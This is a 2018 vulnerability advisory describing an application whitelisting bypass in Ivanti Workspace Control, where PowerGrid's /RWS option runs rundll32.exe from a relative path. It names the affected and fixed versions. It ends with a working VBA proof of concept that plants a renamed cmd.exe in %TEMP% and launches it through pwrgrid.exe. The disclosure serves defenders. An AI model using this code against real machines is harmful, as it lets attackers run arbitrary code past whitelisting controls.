Ivanti Workspace Control Application PowerGrid RWS Whitelist Bypass

------------------------------------------------------------------------
Ivanti Workspace Control Application Whitelist bypass via PowerGrid /RWS
command line argument
------------------------------------------------------------------------
Yorick Koster, August 2018

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was found that the PowerGrid application will execute rundll32.exe
from a relative path when it is started with the /RWS command line
option. An attacker can abuse this issue to bypass Application
Whitelisting in order to run arbitrary code on the target machine.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully verified on Ivanti Workspace Control version
10.2.700.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue was resolved in Ivanti Workspace Control version 10.2.950.0.
PowerGrid now uses the GetSystemDirectory() function to construct an
absolute path to rundll32.exe.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20180801/ivanti-workspace-control-application-whitelist-bypass-via-powergrid-_rws-command-line-argument.html


Proof of concept

The VBA code below demonstrates this issue. The code tries to run cmd.exe from the %TEMP% folder.

Private Sub PowerGridAWLBypass()
   On Error Resume Next
   Dim tmpPath, resPath, targetPath
   tmpPath = Environ("TEMP")
   resPath = Environ("RESPFDIR")
   targetPath = Environ("SystemRoot") & "\System32\cmd.exe"
   
   FileCopy targetPath, tmpPath & "\rundll32.exe"
   ChDir tmpPath
   Dim fso As Object
   Set fso = CreateObject("Scripting.FileSystemObject")
   Dim oFile As Object
   Set oFile = fso.CreateTextFile(tmpPath & "\foo.xml")
   oFile.WriteLine "<foo></foo>"
   oFile.Close
   Set fso = Nothing
   Set oFile = Nothing
   Shell resPath & "\pwrgrid.exe /RWS foo.xml", vbNormalFocus
End Sub